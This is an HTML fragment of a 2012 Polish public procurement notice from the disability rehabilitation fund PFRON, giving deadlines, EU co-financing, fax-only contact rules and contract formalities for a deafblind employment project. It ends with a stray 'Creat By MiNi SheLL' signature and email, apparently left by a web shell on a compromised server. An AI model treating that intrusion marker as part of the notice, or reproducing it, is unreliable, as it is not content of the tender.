<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2012 godzina 13:30, miejsce: Państwowy Fundusz Rehabilitacji Osób Niepełnosprawnych 00-828 Warszawa, Al. Jana Pawła II nr 13 Kancelaria - parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Koszty w 2012 roku w ramach projektu Wsparcie osób głuchoniewidomych na rynku pracy II - Weź sprawy w swoje ręce w ramach Priorytetu 1 Programu Operacyjnego Kapitał Ludzki 2007-2013 Zatrudnienie i integracja społeczna, Działanie 1.3 Ogólnopolskie programy integracji i aktywizacji zawodowej, Poddziałanie 1.3.6. będą współfinansowane w 85% ze środków EFS oraz w 15% ze środków PFRON XII.	Informacje o sposobie porozumiewania się Zamawiającego z Wykonawcami oraz przekazywania oświadczeń i dokumentów.
W postępowaniu obowiązuje forma porozumiewania się pomiędzy Zamawiającym a Wykonawcami za pomocą faksu. Fakt otrzymania wszelkich informacji ww. drogą zostanie, na żądanie drugiej strony, niezwłocznie potwierdzony faksem zwrotnym. Zawsze, zgodnie z art. 27 ust. 3 ustawy, dopuszczalna jest forma pisemna. Numer faksu Zamawiającego oraz osoby do kontaktu - jak w rozdziale XI SIWZ. Zamawiający nie dopuszcza porozumiewania się drogą elektroniczną.
XIV.	Osoby uprawnione do kontaktów z Wykonawcami 
Informacji na temat niniejszego postępowania udzielają w godzinach  900 - 1400, pon. - pt.:
w zakresie przedmiotu zamówienia:

Joanna Skrzyńska tel.  22 50 55 539

w zakresie przebiegu postępowania:
Anna Solnica tel. 22 50 55 494, fax 22 50 55 275
1.	Warunki na jakich Zamawiający zawrze Umowę z Wykonawcą zostały przedstawione w Istotnych dla Stron postanowieniach Umowy (załącznik nr 6 do SIWZ). XXVII.	Formalności, jakich Wykonawca oferty najkorzystniejszej musi dopełnić przed zawarciem
 umowy.
Wykonawca na wezwanie Zamawiającego w terminie przez niego wyznaczonym ma obowiązek:
1.	wskazać osobę/osoby uprawnione do podpisania Umowy wraz z dokumentami uprawniającymi 
te osoby do podpisania Umowy, o ile nie wynika to ze złożonych wraz z ofertą dokumentów,
2.	podać numer rachunku bankowego, na który będzie przelana należność z tytułu wykonania zamówienia oraz wszelkie informacje niezbędne do wypełnienia treści Umowy,
3.	w przypadku Wykonawców wspólnie ubiegających się o zamówienie, dostarczyć Umowę regulującą współpracę tych Wykonawców (zgodnie z art. 23 ust. 4 ustawy).
4.	złożyć uwierzytelnioną kopię orzeczenia o niepełnosprawności lub równoważnego osoby zatrudnionej do realizacji przedmiotu zamówienia wraz z oświadczeniem lub deklaracją dotyczącą wyrażenia zgody na przetwarzanie danych osobowych przez Wykonawcę i Zamawiającego od osoby, której dotyczy orzeczenie o niepełnosprawności lub równoważne..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com